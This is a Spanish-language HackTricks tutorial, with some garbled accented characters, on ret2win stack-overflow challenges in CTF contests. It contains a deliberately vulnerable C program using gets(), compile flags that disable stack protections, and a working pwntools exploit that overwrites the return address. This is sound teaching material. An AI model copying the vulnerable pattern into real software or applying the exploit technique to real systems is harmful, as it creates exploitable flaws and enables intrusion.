Ret2win

Reading time: 6 minutes

tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks

Informaci贸n B谩sica

Los desaf铆os de Ret2win son una categor铆a popular en las competiciones de Capture The Flag (CTF), particularmente en tareas que involucran explotaci贸n binaria. El objetivo es explotar una vulnerabilidad en un binario dado para ejecutar una funci贸n espec铆fica, no invocada, dentro del binario, a menudo llamada algo como win, flag, etc. Esta funci贸n, cuando se ejecuta, generalmente imprime una bandera o un mensaje de 茅xito. El desaf铆o t铆picamente implica sobrescribir la direcci贸n de retorno en la pila para desviar el flujo de ejecuci贸n a la funci贸n deseada. Aqu铆 hay una explicaci贸n m谩s detallada con ejemplos:

Ejemplo en C

Considera un programa simple en C con una vulnerabilidad y una funci贸n win que pretendemos llamar:

c
#include <stdio.h>
#include <string.h>

void win() {
printf("Congratulations! You've called the win function.\n");
}

void vulnerable_function() {
char buf[64];
gets(buf); // This function is dangerous because it does not check the size of the input, leading to buffer overflow.
}

int main() {
vulnerable_function();
return 0;
}

Para compilar este programa sin protecciones de pila y con ASLR desactivado, puedes usar el siguiente comando:

sh
gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c
  • -m32: Compila el programa como un binario de 32 bits (esto es opcional pero com煤n en desaf铆os CTF).
  • -fno-stack-protector: Desactiva las protecciones contra desbordamientos de pila.
  • -z execstack: Permite la ejecuci贸n de c贸digo en la pila.
  • -no-pie: Desactiva el ejecutable independiente de la posici贸n para asegurar que la direcci贸n de la funci贸n win no cambie.
  • -o vulnerable: Nombra el archivo de salida vulnerable.

Python Exploit usando Pwntools

Para el exploit, utilizaremos pwntools, un potente marco CTF para escribir exploits. El script de exploit crear谩 una carga 煤til para desbordar el b煤fer y sobrescribir la direcci贸n de retorno con la direcci贸n de la funci贸n win.

python
from pwn import *

# Set up the process and context for the binary
binary_path = './vulnerable'
p = process(binary_path)
context.binary = binary_path

# Find the address of the win function
win_addr = p32(0x08048456)  # Replace 0x08048456 with the actual address of the win function in your binary

# Create the payload
# The buffer size is 64 bytes, and the saved EBP is 4 bytes. Hence, we need 68 bytes before we overwrite the return address.
payload = b'A' * 68 + win_addr

# Send the payload
p.sendline(payload)
p.interactive()

Para encontrar la direcci贸n de la funci贸n win, puedes usar gdb, objdump o cualquier otra herramienta que te permita inspeccionar archivos binarios. Por ejemplo, con objdump, podr铆as usar:

sh
objdump -d vulnerable | grep win

Este comando te mostrar谩 el ensamblaje de la funci贸n win, incluyendo su direcci贸n de inicio.

El script de Python env铆a un mensaje cuidadosamente elaborado que, al ser procesado por la vulnerable_function, desborda el b煤fer y sobrescribe la direcci贸n de retorno en la pila con la direcci贸n de win. Cuando vulnerable_function retorna, en lugar de regresar a main o salir, salta a win, y se imprime el mensaje.

Protecciones

  • PIE debe estar deshabilitado para que la direcci贸n sea confiable a trav茅s de ejecuciones o la direcci贸n donde se almacenar谩 la funci贸n no siempre ser谩 la misma y necesitar铆as alguna filtraci贸n para averiguar d贸nde se carga la funci贸n win. En algunos casos, cuando la funci贸n que causa el desbordamiento es read o similar, puedes hacer un Partial Overwrite de 1 o 2 bytes para cambiar la direcci贸n de retorno a la funci贸n win. Debido a c贸mo funciona ASLR, los 煤ltimos tres nibble hexadecimales no est谩n aleatorizados, por lo que hay una 1/16 de probabilidad (1 nibble) de obtener la direcci贸n de retorno correcta.
  • Stack Canaries tambi茅n deben estar deshabilitados o la direcci贸n de retorno EIP comprometida nunca ser谩 seguida.

Otros ejemplos y Referencias

Ejemplo ARM64

Ret2win - arm64

tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks